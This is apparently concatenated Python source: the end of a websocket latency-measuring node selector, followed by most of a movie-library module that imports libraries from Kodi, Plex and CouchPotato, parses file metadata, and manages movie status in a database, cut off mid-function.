Builds a list composed of latency_points
Parameters
----------
host
Host name
port
Port
timeout
Server response timeout
runs
Number of attempts
wait
Delay before request
Returns
-------
list
list of latency for all runs
"""
tasks = []
latency_points = []
for i in range(runs):
await asyncio.sleep(wait)
tasks.append(asyncio.create_task(NodeSelector.latency_point(host=host, port=port, timeout=timeout)))
# last_latency_point = await latency_point(host=host, port=port, timeout=timeout)
for i in range(runs):
latency_points.append(await tasks[i])
return latency_points
@staticmethod
async def latency_point(host: str, port: int = 443, timeout: float = 5) -> Optional[float]:
"""
Calculate a latency point using sockets. If something bad happens the point returned is None
Parameters
----------
host
Host name
port
Port
timeout
Server response timeout
Returns
-------
Optional[float]
Returns float if possible
"""
# New Socket and Time out
# Start a timer
s_start = time.time()
# Try to Connect
uri = f"ws://{host}:{port}"
try:
async with websockets.connect(uri, close_timeout=timeout):
pass
except exceptions.InvalidMessage:
pass
except exceptions.InvalidStatusCode:
pass
except Exception as e:
logger.debug(str(e))
return None
# Stop Timer
s_runtime = (time.time() - s_start) * 1000
return float(s_runtime)
# singleton for background work with the list of nodes
node_selector = NodeSelector(config.TEST_NODE_URLs)
|
library.py | import os
import re
import json
import datetime
import logging
import csv
import threading
from core import searchresults, plugins
import core
from core.movieinfo import TheMovieDatabase, Poster
from core.helpers import Url
from hachoir.parser import createParser
from hachoir.metadata import extractMetadata
import PTN
from gettext import gettext as _
logging = logging.getLogger(__name__)
class ImportDirectory(object):
@staticmethod
def scan_dir(directory, minsize=500, recursive=True):
''' Scans directory for movie files
directory (str): absolute path to base directory of movie library
minsize (int): minimum filesize in MB <optional - default 500>
recursive (bool): scan recursively or just root directory <optional - default True>
Checks mimetype for video type
Returns dict ajax-style response
'''
logging.info('Scanning {} for movies.'.format(directory))
files = []
try:
if recursive:
files = ImportDirectory._walk(directory)
else:
files = [os.path.join(directory, i) for i in os.listdir(directory) if os.path.isfile(os.path.join(directory, i))]
except Exception as e:
logging.debug('scan_dir() ImportDirectory._walk exception {}'.format(str(e)))
return {'error': str(e)}
f = []
logging.debug('Specified minimum file size: {} Bytes.'.format(minsize * 1024**2))
ms = minsize * 1024**2
for i in files:
# Ignore file not found errors (eg file was deleted between directory walk and size check)
try:
s = os.path.getsize(i)
if not s >= (ms):
logging.debug('{} size is {} skipping.'.format(i, s))
continue
f.append(i)
except Exception as e:
logging.debug('scan_dir() os.path.getsize exception {}'.format(str(e)))
continue
return {'files': f}
@staticmethod
def _walk(directory):
''' Recursively gets all files in dir
directory: directory to scan for files
Returns list of absolute file paths
'''
files = []
dir_contents = os.listdir(directory)
for i in dir_contents:
full_path = os.path.join(directory, i)
if os.path.isdir(full_path):
logging.debug('Scanning {}{}{}'.format(directory, os.sep, i))
files = files + ImportDirectory._walk(full_path)
else:
logging.debug('Found file {}'.format(full_path))
files.append(full_path)
return files
class ImportKodiLibrary(object):
@staticmethod
def get_movies(url):
''' Gets list of movies from kodi server
url (str): url of kodi server
url should include auth info if required.
Gets movies from kodi, reformats list, and adds resolution/source info.
Since Kodi doesn't care about souce we default to BluRay-<resolution>
Returns dict ajax-style response
'''
krequest = {'jsonrpc': '2.0',
'method': 'VideoLibrary.GetMovies',
'params': {
'limits': {
'start': 0,
'end': 0
},
'properties': [
'title',
'year',
'imdbnumber',
'file',
'streamdetails'
],
'sort': {
'order': 'ascending',
'method': 'label',
'ignorearticle': True
}
},
'id': 'libMovies'
}
logging.info('Retreiving movies from Kodi.')
url = '{}/jsonrpc?request={}'.format(url, json.dumps(krequest))
try:
response = Url.open(url)
except Exception as e:
logging.error('Unable to reach Kodi server.', exc_info=True)
return {'response': False, 'error': str(e.args[0].reason).split(']')[-1]}
if response.status_code != 200:
return {'response': False, 'error': '{} {}'.format(response.status_code, response.reason.title())}
library = [i['imdbid'] for i in core.sql.get_user_movies()]
movies = []
today = str(datetime.date.today())
for i in json.loads(response.text)['result']['movies']:
if i['imdbnumber'] in library:
logging.info('{} in library, skipping.'.format(i['imdbnumber']))
continue
logging.info('Found Kodi movie {}.'.format(i['title']))
movie = {}
movie['title'] = i['title']
movie['year'] = i['year']
movie['imdbid'] = i['imdbnumber']
movie['file'] = i['file']
movie['added_date'] = movie['finished_date'] = today
movie['audiocodec'] = i['streamdetails']['audio'][0].get('codec') if i['streamdetails']['audio'] else ''
if movie['audiocodec'] == 'dca' or movie['audiocodec'].startswith('dts'):
movie['audiocodec'] = 'DTS'
movie['resolution'] = 'Unknown'
if i['streamdetails']['video']:
movie['videocodec'] = i['streamdetails']['video'][0].get('codec')
width = i['streamdetails']['video'][0]['width']
if width > 1920:
movie['resolution'] = 'BluRay-4K'
elif 1920 >= width > 1440:
movie['resolution'] = 'BluRay-1080P'
elif 1440 >= width > 720:
movie['resolution'] = 'BluRay-720P'
else:
movie['resolution'] = 'DVD-SD'
else:
movie['videocodec'] = ''
movies.append(movie)
return {'response': True, 'movies': movies}
class ImportPlexLibrary(object):
''' Several of these methods are not currently used due to Plex's
api being less than ideal.
'''
@staticmethod
def read_csv(csv_text):
''' Parse plex csv
csv_text (str): text from csv file
Returns dict ajax-style response
'''
logging.info('Parsing Plex library CSV.')
library = [i['imdbid'] for i in core.sql.get_user_movies()]
library_tmdb = [i['tmdbid'] for i in core.sql.get_user_movies()]
delim = csv_text.split('"')[2]
if delim not in (',', ';', '|', ':', '\t'):
delim = ','
try:
movies = []
reader = csv.DictReader(csv_text.splitlines(), delimiter=delim)
for row in reader:
movies.append(dict(row))
except Exception as e:
return {'response': False, 'error': str(e)}
parsed_movies = []
incomplete = []
today = str(datetime.date.today())
for movie in movies:
parsed = {}
try:
logging.info('Parsing Plex movie {}'.format(movie['Title']))
complete = True
db_id = movie['MetaDB Link'].split('/')[-1]
if db_id.startswith('tt'):
if db_id in library:
continue
else:
parsed['imdbid'] = db_id
elif db_id.isdigit():
if db_id in library_tmdb:
continue
else:
parsed['tmdbid'] = db_id
else:
parsed['imdbid'] = ''
complete = False
parsed['title'] = movie['Title']
parsed['year'] = movie['Year']
parsed['added_date'] = parsed['finished_date'] = today
parsed['audiocodec'] = movie['Audio Codec']
if parsed['audiocodec'] == 'dca' or parsed['audiocodec'].startswith('dts'):
parsed['audiocodec'] = 'DTS'
w = movie['Width']
pw = ''
while len(w) > 0 and w[0].isdigit():
pw += w[0]
w = w[1:]
if pw:
width = int(pw)
else:
width = 0
complete = False
if width > 1920:
parsed['resolution'] = 'BluRay-4K'
elif 1920 >= width > 1440:
parsed['resolution'] = 'BluRay-1080P'
elif 1440 >= width > 720:
parsed['resolution'] = 'BluRay-720P'
else:
parsed['resolution'] = 'DVD-SD'
s = movie['Part Size as Bytes']
ps = ''
while len(s) > 0 and s[0].isdigit():
ps += s[0]
s = s[1:]
parsed['size'] = int(ps) if ps else 0
parsed['file'] = movie['Part File']
if complete:
parsed_movies.append(parsed)
else:
incomplete.append(parsed)
except Exception as e:
logging.error('Error parsing Plex CSV.', exc_info=True)
incomplete.append(parsed)
return {'response': True, 'complete': parsed_movies, 'incomplete': incomplete}
class ImportCPLibrary(object):
@staticmethod
def get_movies(url):
''' Gets list of movies from CP
url (str): full url of cp movies.list api call
Returns dict ajax-style response
'''
logging.info('Reading CouchPotato library.')
try:
r = Url.open(url)
except Exception as e:
return {'response': False, 'error': str(e)}
if r.status_code != 200:
return {'response': False, 'error': '{} {}'.format(r.status_code, r.reason.title())}
try:
cp = json.loads(r.text)
except Exception as e:
return {'response': False, 'error': _('Malformed json response from CouchPotato')}
if cp['total'] == 0:
return ['']
library = [i['imdbid'] for i in core.sql.get_user_movies()]
movies = []
for m in cp['movies']:
if m['info']['imdb'] in library:
logging.debug('{} in library, skipping.'.format(m['info']['original_title']))
continue
logging.debug('Parsing CouchPotato movie {}'.format(m['info']['original_title']))
movie = {}
if m['status'] == 'done':
movie['status'] = 'Disabled'
for i in m['releases']:
if i['status'] == 'done':
if i.get('info'):
# handle missing keys - not all CP entries have all fields populated
try:
name = i['info']['name']
except Exception as e:
name = m['info']['original_title']
elif i.get('identifier'):
name = i['identifier'].lower()
else:
continue
title_data = PTN.parse(name)
movie['audiocodec'] = title_data.get('audio')
movie['videocodec'] = title_data.get('codec')
for filepath in i.get('files', {}).get('movie', []):
movie['category'] = Metadata.get_category_from_path(filepath)
if movie['category']:
movie['finished_file'] = filepath
break
try:
movie['size'] = i.get('info', {}).get('size', 0) * 1024 * 1024
except Exception as e:
movie['size'] = 0
if any(i in name for i in ['4K', 'UHD', '2160P']):
movie['resolution'] = 'BluRay-4K'
elif any(i in name for i in ['1080', 'brrip', 'bdrip', 'bluray']):
movie['resolution'] = 'BluRay-1080P'
elif '720' in name:
movie['resolution'] = 'BluRay-720P'
else:
movie['resolution'] = 'DVD-SD'
break
movie.setdefault('size', 0)
movie['quality'] = 'Default'
else:
movie['status'] = 'Waiting'
movie.setdefault('resolution', 'BluRay-1080P')
cpm = m['info']
movie['title'] = cpm.get('original_title') or ''
movie['year'] = cpm.get('year') or 'N/A'
movie['overview'] = cpm.get('plot') or ''
p = (cpm.get('images', {}).get('poster_original') or [''])[0].split('/')[-1]
if p:
movie['poster_path'] = p
else:
movie['poster_path'] = None
movie['url'] = 'https://www.themoviedb.org/movie/{}'.format(cpm.get('tmdb_id', ''))
movie['vote_average'] = cpm.get('rating', {}).get('imdb', [0])[0]
movie['imdbid'] = cpm.get('imdb')
movie['id'] = cpm.get('tmdb_id')
ts = cpm.get('release_date', {}).get('theater')
movie['release_date'] = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d') if ts else None
movie['alternative_titles'] = {'titles': [{'iso_3166_1': 'US',
'title': ','.join(cpm.get('titles', []))
}]
}
movie['release_dates'] = {'results': []}
movies.append(movie)
return {'response': True, 'movies': movies}
class Metadata(object):
''' Methods for gathering/preparing metadata for movies
'''
@staticmethod
def from_file(filepath, imdbid=None):
''' Gets video metadata using hachoir.parser
filepath (str): absolute path to movie file
imdbid (str): imdb id # <optional - Default None>
On failure can return empty dict
Returns dict
'''
logging.info('Gathering metadata for {}.'.format(filepath))
data = {
'title': None,
'year': None,
'resolution': None,
'rated': None,
'imdbid': imdbid,
'videocodec': None,
'audiocodec': None,
'releasegroup': None,
'source': None,
'quality': None,
'category': None,
'path': filepath,
'edition': []
}
titledata = Metadata.parse_filename(filepath)
data.update(titledata)
filedata = Metadata.parse_media(filepath)
data.update(filedata)
if data.get('resolution'):
if data['resolution'].upper() in ('4K', '1080P', '720P'):
data['resolution'] = '{}-{}'.format(data['source'] or 'BluRay', data['resolution'].upper())
else:
data['resolution'] = 'DVD-SD'
if data.get('title') and not data.get('imdbid'):
title_date = '{} {}'.format(data['title'], data['year']) if data.get('year') else data['title']
tmdbdata = TheMovieDatabase.search(title_date, single=True)
if not tmdbdata:
logging.warning('Unable to get data from TheMovieDB for {}'.format(data['title']))
return data
tmdbdata = tmdbdata[0]
tmdbid = tmdbdata.get('id')
if not tmdbid:
logging.warning('Unable to get data from TheMovieDB for {}'.format(data['imdbid']))
return data
tmdbdata = tmdbdata = TheMovieDatabase._search_tmdbid(tmdbid)
if tmdbdata:
tmdbdata = tmdbdata[0]
else:
logging.warning('Unable to get data from TMDB for {}'.format(data['imdbid']))
return data
data['year'] = tmdbdata['release_date'][:4]
data.update(tmdbdata)
if data.get('3d'):
data['edition'].append('3D')
data['edition'] = ' '.join(sorted(data['edition']))
return data
@staticmethod
def parse_media(filepath):
''' Uses Hachoir-metadata to parse the file header to metadata
filepath (str): absolute path to file
Attempts to get resolution from media width
Returns dict of metadata
'''
logging.info('Parsing codec data from file {}.'.format(filepath))
metadata = {}
try:
with createParser(filepath) as parser:
extractor = extractMetadata(parser)
filedata = extractor.exportDictionary(human=False)
parser.stream._input.close()
except Exception as e:
logging.error('Unable to parse metadata from file header.', exc_info=True)
return metadata
if filedata:
# For mp4, mvk, avi in order
video = filedata.get('Metadata') or \
filedata.get('video[1]') or \
filedata.get('video') or \
{}
# mp4 doesn't have audio data so this is just for mkv and avi
audio = filedata.get('audio[1]') or {}
if video.get('width'):
width = int(video.get('width'))
if width > 1920:
metadata['resolution'] = '4K'
elif 1920 >= width > 1440:
metadata['resolution'] = '1080P'
elif 1440 >= width > 720:
metadata['resolution'] = '720P'
else:
metadata['resolution'] = 'SD'
else:
metadata['resolution'] = 'SD'
if audio.get('compression'):
metadata['audiocodec'] = audio['compression'].replace('A_', '')
if video.get('compression'):
metadata['videocodec'] = video['compression'].split('/')[0].split('(')[0].replace('V_', '')
return metadata
@staticmethod
def parse_filename(filepath):
''' Uses PTN to get as much info as possible from path
filepath (str): absolute path to movie file
Parses parent directory name first, then file name if folder name seems incomplete.
Returns dict of metadata
'''
dirname = os.path.split(filepath)[0].split(os.sep)[-1]
logging.info('Parsing directory name for movie information: {}.'.format(dirname))
meta_data = PTN.parse(dirname)
for i in ('excess', 'episode', 'episodeName', 'season', 'garbage', 'website'):
meta_data.pop(i, None)
if len(meta_data) > 3:
meta_data['release_name'] = dirname
logging.info('Found {} in filename.'.format(meta_data))
else:
logging.debug('Parsing directory name does not look accurate. Parsing file name.')
filename = os.path.basename(filepath)
meta_data = PTN.parse(filename)
logging.info('Found {} in file name.'.format(meta_data))
if len(meta_data) < 2:
logging.warning('Little information found in file name. Movie may be incomplete.')
meta_data['release_title'] = filename
title = meta_data.get('title')
if title and title[-1] == '.':
meta_data['title'] = title[:-1]
# Make sure this matches our key names
if 'year' in meta_data:
meta_data['year'] = str(meta_data['year'])
meta_data['videocodec'] = meta_data.pop('codec', None)
meta_data['audiocodec'] = meta_data.pop('audio', None)
meta_data['category'] = Metadata.get_category_from_path(filepath)
qual = meta_data.pop('quality', '')
for source, aliases in core.CONFIG['Quality']['Aliases'].items():
if any(a.lower() == qual.lower() for a in aliases):
meta_data['source'] = source
break
meta_data.setdefault('source', None)
meta_data['releasegroup'] = meta_data.pop('group', None)
return meta_data
@staticmethod
def get_category_from_path(filepath):
moverpath = core.CONFIG['Postprocessing']['moverpath']
if moverpath and filepath.startswith(Metadata.root_mover_path(moverpath)):
return 'Default'
for category, category_config in core.CONFIG['Categories'].items():
moverpath = category_config['moverpath']
if moverpath and filepath.startswith(Metadata.root_mover_path(moverpath)):
return category
return None
@staticmethod
def root_mover_path(path):
path = os.path.join(path, '') # ensure path ends with /
return os.path.join(os.path.split(re.sub("{.+}.*$", '', path))[0], '')
@staticmethod
def convert_to_db(movie):
''' Takes movie data and converts to a database-writable dict
movie (dict): of movie information
Used to prepare TMDB's movie response for write into MOVIES
Must include Watcher-specific keys ie resolution
Makes sure all keys match and are present
Sorts out alternative titles and digital release dates
Returns dict ready to sql.write into MOVIES
'''
logging.info('Converting movie metadata to database structure for {}.'.format(movie['title']))
if not movie.get('imdbid'):
movie['imdbid'] = 'N/A'
if not movie.get('year') and movie.get('release_date'):
movie['year'] = movie['release_date'][:4]
elif not movie.get('year'):
movie['year'] = 'N/A'
movie.setdefault('added_date', str(datetime.date.today()))
if movie.get('poster_path'):
movie['poster'] = '{}.jpg'.format(movie['imdbid'])
else:
movie['poster'] = None
movie['plot'] = movie.get('overview') if not movie.get('plot') else movie.get('plot')
movie['url'] = 'https://www.themoviedb.org/movie/{}'.format(movie.get('id', movie.get('tmdbid')))
movie['score'] = movie.get('score') or movie.get('vote_average') or 0
if not movie.get('status'):
movie['status'] = 'Waiting'
movie['backlog'] = 0
if not movie.get('tmdbid'):
movie['tmdbid'] = movie.get('id')
if movie.get('alternative_titles') and not isinstance(movie.get('alternative_titles'), str):
a_t = []
for i in movie.get('alternative_titles', {}).get('titles', []):
if i['iso_3166_1'] == 'US':
a_t.append(i['title'])
movie['alternative_titles'] = ','.join(a_t)
dates = []
for i in movie.get('release_dates', {}).get('results', []):
for d in i['release_dates']:
if d['type'] >= 4:
dates.append(d['release_date'])
if dates:
movie['media_release_date'] = min(dates)[:10]
if not movie.get('quality'):
movie['quality'] = 'Default'
if not movie.get('category'):
movie['category'] = 'Default'
movie['finished_file'] = movie.get('finished_file')
if movie['title'].startswith('The '):
movie['sort_title'] = movie['title'][4:] + ', The'
elif movie['title'].startswith('A '):
movie['sort_title'] = movie['title'][2:] + ', A'
elif movie['title'].startswith('An '):
movie['sort_title'] = movie['title'][3:] + ', An'
else:
movie['sort_title'] = movie['title']
if not movie.get('filters'):
movie['filters'] = '{"preferredwords": "", "requiredwords": "", "ignoredwords": ""}'
for k, v in movie.items():
if isinstance(v, str):
movie[k] = v.strip()
movie = {k: v for k, v in movie.items() if k in [i.name for i in core.sql.MOVIES.c]}
return movie
@staticmethod
def update(imdbid, tmdbid=None, force_poster=True):
''' Updates metadata from TMDB
imdbid (str): imdb id #
tmdbid (str): or int tmdb id # <optional - default None>
force_poster (bool): whether or not to always redownload poster <optional - default True>
If tmdbid is None, looks in database for tmdbid using imdbid.
If that fails, looks on tmdb api for imdbid
If that fails returns error message
If force_poster is True, the poster will be re-downloaded.
If force_poster is False, the poster will only be redownloaded if the local
database does not have a 'poster' filepath stored. In other words, this
will only grab missing posters.
Returns dict ajax-style response
'''
logging.info('Updating metadata for {}'.format(imdbid))
movie = core.sql.get_movie_details('imdbid', imdbid)
if force_poster:
get_poster = True
elif not movie.get('poster'):
get_poster = True
elif not os.path.isfile(os.path.join(core.PROG_PATH, movie['poster'])):
get_poster = True
else:
logging.debug('Poster will not be redownloaded.')
get_poster = False
if tmdbid is None:
tmdbid = movie.get('tmdbid')
if not tmdbid:
logging.debug('TMDB id not found in local database, searching TMDB for {}'.format(imdbid))
tmdb_data = TheMovieDatabase._search_imdbid(imdbid)
tmdbid = tmdb_data[0].get('id') if tmdb_data else None
if not tmdbid:
logging.debug('Unable to find {} on TMDB.'.format(imdbid))
return {'response': False, 'error': 'Unable to find {} on TMDB.'.format(imdbid)}
new_data = TheMovieDatabase._search_tmdbid(tmdbid)
if not new_data:
logging.warning('Empty response from TMDB.')
return
else:
new_data = new_data[0]
new_data.pop('status')
target_poster = os.path.join(Poster.folder, '{}.jpg'.format(imdbid))
if new_data.get('poster_path'):
poster_path = 'http://image.tmdb.org/t/p/w300{}'.format(new_data['poster_path'])
movie['poster'] = '{}.jpg'.format(movie['imdbid'])
else:
poster_path = None
movie.update(new_data)
movie = Metadata.convert_to_db(movie)
core.sql.update_multiple_values('MOVIES', movie, 'imdbid', imdbid)
if poster_path and get_poster:
if os.path.isfile(target_poster):
try:
os.remove(target_poster)
except FileNotFoundError:
pass
except Exception as e:
logging.warning('Unable to remove existing poster.', exc_info=True)
return {'response': False, 'error': 'Unable to remove existing poster.'}
Poster.save(imdbid, poster_path)
return {'response': True, 'message': 'Metadata updated.'}
class Manage(object):
''' Methods to manipulate status of movies or search results in database
'''
@staticmethod
def scanmissingfiles():
movies = core.sql.execute(['SELECT * FROM MOVIES WHERE finished_file is not null'])
if movies is None:
logging.warning('Unable to read database.')
return
movies = core.sqldb.proxy_to_dict(movies)
action = core.CONFIG['System']['FileManagement']['missingfileaction']
db_update_values = []
for i in movies:
if not os.path.exists(i['finished_file']):
logging.info('File {} is missing for movie {}'.format(i['finished_file'], i['title']))
if action == 'remove':
if Manage.remove_movie(i['imdbid'])['response'] is False:
logging.error('Unable to remove {} from library'.format(i['title']))
elif action == 'revert':
db_update_values.append({'imdbid': i['imdbid'],
'finished_file': None,
'finished_date': None,
'status': 'Wanted',
'backlog': 0})
if core.sql.delete('MARKEDRESULTS', 'imdbid', i['imdbid']) is None or \
core.sql.delete('SEARCHRESULTS', 'imdbid', i['imdbid']) is None:
logging.warning('Unable to remove marked releases. Status change may be incorrect.')
if len(db_update_values) > 0:
core.sql.update_multiple_rows('MOVIES', db_update_values, 'imdbid')
return
@staticmethod
def verify(movie, today=None):
''' Checks for verfied releases based on config
movie (dict): movie info
today (obj): datetime.datetime.today() object <optional - default calls datetime.dateimte.today()>
Checks (in order):
If verify releases is enabled
If movie has a theatrical release date
If theatrical release date is older than skip weeks per user config
If predb verification -- check predb
If home media release verification - check if release is in the past
If all enabled conditions fail, return False
Returns Bool
'''
today = today or datetime.datetime.today()
if core.CONFIG['Search']['verifyreleases'] == '':
verified = True
elif not movie.get('release_date'):
logging.info('{} does not have a theatrical release date, skipping verification check as Unverified.'.format(movie['title']))
verified = False
elif core.CONFIG['Search']['verifyreleasesskip'] and datetime.datetime.strptime(movie['release_date'], '%Y-%m-%d') + datetime.timedelta(days=7 * core.CONFIG['Search']['verifyreleasesskipweeks']) < today:
logging.info('{} is older than {}, skipping verification check as Verified.'.format(movie['title'], core.CONFIG['Search']['verifyreleasesskipweeks']))
verified = True
elif core.CONFIG['Search']['verifyreleases'] == 'predb':
if movie.get('predb') == 'found':
verified = True
else:
verified = False
elif core.CONFIG['Search']['verifyreleases'] == 'mediareleasedate':
if not movie.get('predb') and movie.get('predb_backlog'):
logging.debug('Resetting predb backlog status for unfound movie {} {}'.format(movie['title'], movie['year']))
core.sql.update('MOVIES', 'predb_backlog', None, 'imdbid', movie['imdbid'])
if not movie.get('media_release_date'):
logging.info('{} does not yet have a home media release date.'.format(movie['title']))
verified = False
else:
media_release = datetime.datetime.strptime(movie['media_release_date'], '%Y-%m-%d')
if media_release < today:
verified = True
else:
verified = False
else:
verified = False
if verified and movie['status'] == 'Waiting':
logging.info('Verification criteria met for {} {}, setting status to Wanted'.format(movie['title'], movie['year']))
core.sql.update('MOVIES', 'status', 'Wanted', 'imdbid', movie['imdbid'])
elif not verified and movie['status'] not in ('Waiting', 'Disabled', 'Finished'):
logging.info('Verified criteria not met for {} {}, resetting setting status to Waiting'.format(movie['title'], movie['year']))
core.sql.update('MOVIES', 'status', 'Waiting', 'imdbid', movie['imdbid'])
if verified:
logging.info('{} passes verification checks, will include title in search.'.format(movie['title']))
else:
logging.info('{} does not pass verification checks, will ignore for now.'.format(movie['title']))
return verified
@staticmethod
def add_movie(movie, full_metadata=False):
''' Adds movie to Wanted list.
movie (dict): movie info to add to database.
full_metadata (bool): if data is complete and ready for write
movie MUST inlcude tmdb id as data['id']
Writes data to MOVIES table.
If full_metadata is False, searches tmdb for data['id'] and updates data
full_metadata should only be True when passing movie as data pulled
directly from a tmdbid search
If Search on Add enabled,
searches for movie immediately in separate thread.
If Auto Grab enabled, will snatch movie if found.
Returns dict ajax-style response
'''
logging.info('Adding {} to library.'.format(movie.get('title')))
response = {}
tmdbid = movie['id']
if not full_metadata:
logging.debug('More information needed, searching TheMovieDB for {}'.format(tmdbid))
tmdb_data = TheMovieDatabase._search_tmdbid(tmdbid)
if not tmdb_data:
response['error'] = _('Unable to find {} on TMDB.').format(tmdbid)
return response
else:
tmdb_data = tmdb_data[0]
tmdb_data.pop('status')
movie.update(tmdb_data)
if core.sql.row_exists('MOVIES', imdbid=movie['imdbid']):
logging.info('{} already exists in library.'.format(movie['title']))
response['response'] = False
response['error'] = _('{} already exists in library.').format(movie['title'])
return response
if not movie.get('category', None) and movie.get('finished_file', None):
movie['category'] = Metadata.get_category_from_path((movie['finished_file']))
movie.setdefault('quality', 'Default')
movie.setdefault('category', 'Default')
movie.setdefault('status', 'Waiting')
movie.setdefault('origin', 'Search')
poster_path = movie.get('poster_path')
movie = Metadata.convert_to_db(movie)
if not core.sql.write('MOVIES', movie):
response['response'] = False
response['error'] = _('Could not write to database.')
else:
if poster_path:
poster_url = 'http://image.tmdb.org/t/p/w300/{}'.format(poster_path)
threading.Thread(target=Poster.save, args=(movie['imdbid'], poster_url)).start()
response['response'] = True
response['message'] = _('{} {} added to library.').format(movie['title'], movie['year'])
plugins.added(movie['title'], movie['year'], movie['imdbid'], movie['quality'])
return response
@staticmethod
def remove_movie(imdbid):
''' Remove movie from library
imdbid (str): imdb id #
Calls core.sql.remove_movie and removes poster (in separate thread)
Returns dict ajax-style response
'''
logging.info('Removing {} for library.'.format(imdbid))
m = core.sql.get_movie_details('imdbid', imdbid)
removed = core.sql.remove_movie(imdbid)
if removed is True:
response = {'response': True, 'message': _('{} removed from library.').format(m.get('title'))}
threading.Thread(target=Poster.remove, args=(imdbid,)).start()
elif removed is False:
response = {'response': False, 'error': _('Unable to remove {}.').format(m.get('title'))}
elif removed is None:
response = {'response': False, 'error': _('{} does not exist in library.').format(imdbid)}
return response
# @todo move to searchresults module?
@staticmethod
def searchresults(guid, status, movie_info=None):
''' Marks searchresults status
guid (str): download link guid
status (str): status to set
movie_info (dict): of movie metadata <optional - default None>
If guid is in SEARCHRESULTS table, marks it as status.
If guid not in SEARCHRESULTS, uses movie_info to create a result.
Returns bool
'''
TABLE = 'SEARCHRESULTS'
logging.info('Marking guid {} as {}.'.format(guid.split('&')[0], status))
if core.sql.row_exists(TABLE, guid=guid):
# Mark bad in SEARCHRESULTS
logging.info('Marking {} as {} in SEARCHRESULTS.'.format(guid.split('&')[0], status))
if not core.sql.update(TABLE, 'status', status, 'guid', guid):
logging.error('Setting SEARCHRESULTS status of {} to {} failed.'.format(guid.split('&')[0], status))
return False
else:
logging.info('Successfully marked {} as {} in SEARCHRESULTS.'.format(guid.split('&')[0], status))
return True
else:
logging.info('Guid {} not found in SEARCHRESULTS, attempting to create entry.'.format(guid.split('&')[0]))
if movie_info is None:
logging.warning('Movie metadata not supplied, unable to create SEARCHRESULTS entry.')
return False
search_result = searchresults.generate_simulacrum(movie_info)
search_result['indexer'] = 'Post-Processing Import'
if not search_result.get('title'):
search_result['title'] = movie_info['title']
search_result['size'] = os.path.getsize(movie_info.get('orig_filename') or '.')
if not search_result['resolution']:
search_result['resolution'] = 'Unknown'
search_result = searchresults.score([search_result], imported=True)[0]
required_keys = ('score', 'size', 'status', 'pubdate', 'title', 'imdbid', 'indexer', 'date_found', 'info_link', 'guid', 'torrentfile', 'resolution', 'type', 'downloadid', 'freeleech')
search_result = {k: v for k, v in search_result.items() if k in required_keys}
if core.sql.write('SEARCHRESULTS', search_result):
return True
else:
return False
@staticmethod
def markedresults(guid, status, imdbid=None):
''' Marks markedresults status
guid (str): download link guid
status (str): status to set
imdbid (str): imdb identification number <optional - default None>
If guid is in MARKEDRESULTS table, marks it as status.
If guid not in MARKEDRESULTS table, created entry. Requires imdbid.
Returns bool
'''
TABLE = 'MARKEDRESULTS'
if core.sql.row_exists(TABLE, guid=guid):
# Mark bad in MARKEDRESULTS
logging.info('Marking {} as {} in MARKEDRESULTS.'.format(guid.split('&')[0], status))
if not core.sql.update(TABLE, 'status', status, 'guid', guid):
logging.info('Setting MARKEDRESULTS status of {} to {} failed.'.format(guid.split('&')[0], status))
return False
else:
logging.info('Successfully marked {} as {} in MARKEDRESULTS.'.format(guid.split('&')[0], status))
return True
else:
logging.info('Guid {} not found in MARKEDRESULTS, creating entry.'.format(guid.split('&')[0]))
if imdbid:
DB_STRING = {}
DB_STRING['imdbid'] = imdbid
DB_STRING['guid'] = guid
DB_STRING['status'] = status
if core.sql.write(TABLE, DB_STRING):
logging.info('Successfully created entry in MARKEDRESULTS for {}.'.format(guid.split('&')[0]))
return True
else:
logging.error('Unable to create entry in MARKEDRESULTS for {}.'.format(guid.split('&')[0]))
return False
else:
logging.warning('Imdbid not supplied or found, unable to add entry to MARKEDRESULTS.')
return False
@staticmethod
def movie_status(imdbid):
''' Updates Movie status.
imdbid (str): imdb identification number (tt123456)
Updates Movie status based on search results.
Always sets the status to the highest possible level.
Returns str new movie status
'''
logging.info('Determining appropriate status for movie {}.'.format(imdbid))
movie = core.sql.get_movie_details('imdbid', imdbid)
if movie:
current_status = movie.get('status')
else:
return ''
if current_status == 'Disabled':
return 'Disabled'
new_status = None
t = []
if core.CONFIG['Downloader']['Sources']['usenetenabled']:
t.append('nzb')
if core.CONFIG['Downloader']['Sources']['torrentenabled']:
t += ['torrent', 'magnet']
cmd = 'SELECT DISTINCT status FROM SEARCHRESULTS WHERE imdbid="{}" AND (reject_reason IS NULL OR status <> "{}")' \
'AND type IN ("import", "{}")'.format(imdbid, 'Available', '", "'.join(t))
try:
result_status = [i['status'] for i in core.sql.execute([cmd]).fetchall()] or []
except Exception as e:
logging.warning('Unable to determine movie status.', exc_info=True)
result_status = []
if 'Finished' in result_status:
new_status = 'Finished'
elif 'Snatched' in result_status:
new_status = 'Snatched'
elif 'Available' in result_status:
new_status = 'Found'
else:
new_status = 'Wanted' if Manage.verify(movie) else 'Waiting'
logging.info('Setting MOVIES {} status to {}.'.format(imdbid, new_status))
if core.sql.update('MOVIES', 'status', new_status, 'imdbid', imdbid):
return new_status
else:
logging.error('Could not set {} to {}'.format(imdbid, new_status))
return ''
@staticmethod
def add_status_to_search_movies(results):
tmdb_ids = [x.get('id') for x in results]
statuses = core.sql.get_movies_status('tmdbid', tmdb_ids)
for movie_status in statuses:
for movie in results:
# search from TMDB return id as int, but we saved as string in tmdbid
if str(movie['id']) == movie_status['tmdbid']:
# we don't care about disabled in search result, show as finished
movie['status'] = movie_status['status'] if movie_status['status'] != 'Disabled' else 'Finished'
return results
@staticmethod
def get_stats(category=None):
''' Gets stats from database for graphing
Formats data for use with Morris graphing library
Returns dict
'''
logging.info('Generating library stats.')
stats = {}
status = {'Waiting': 0,
'Wanted': 0,
'Found': 0,
'Snatched': 0,
'Finished': 0
}
qualities = {'Default': 0}
for i in core.CONFIG['Quality']['Profiles']:
if i == 'Default':
continue
qualities[i] = 0
if not category:
categories = {'Default': 0}
for i in core.CONFIG['Categories']:
categories[i] = 0
years = {}
added_dates = {}
scores = {}
movies = core.sql.get_user_movies(category = category)
if not movies:
return {'error', 'Unable to read database'}
for movie in movies:
if movie['status'] == 'Disabled':
status['Finished'] += 1
else:
status[movie['status']] += 1
if movie['quality'].startswith('{'):
qualities['Default'] += 1
else:
if movie['quality'] not in qualities:
qualities[movie['quality']] = 1
else:
qualities[movie['quality']] += 1
if not category:
if movie['category'] not in categories:
categories[movie['category']] = 1
else:
categories[movie['category']] += 1
if movie['year'] not in years:
years[movie['year']] = 1
else:
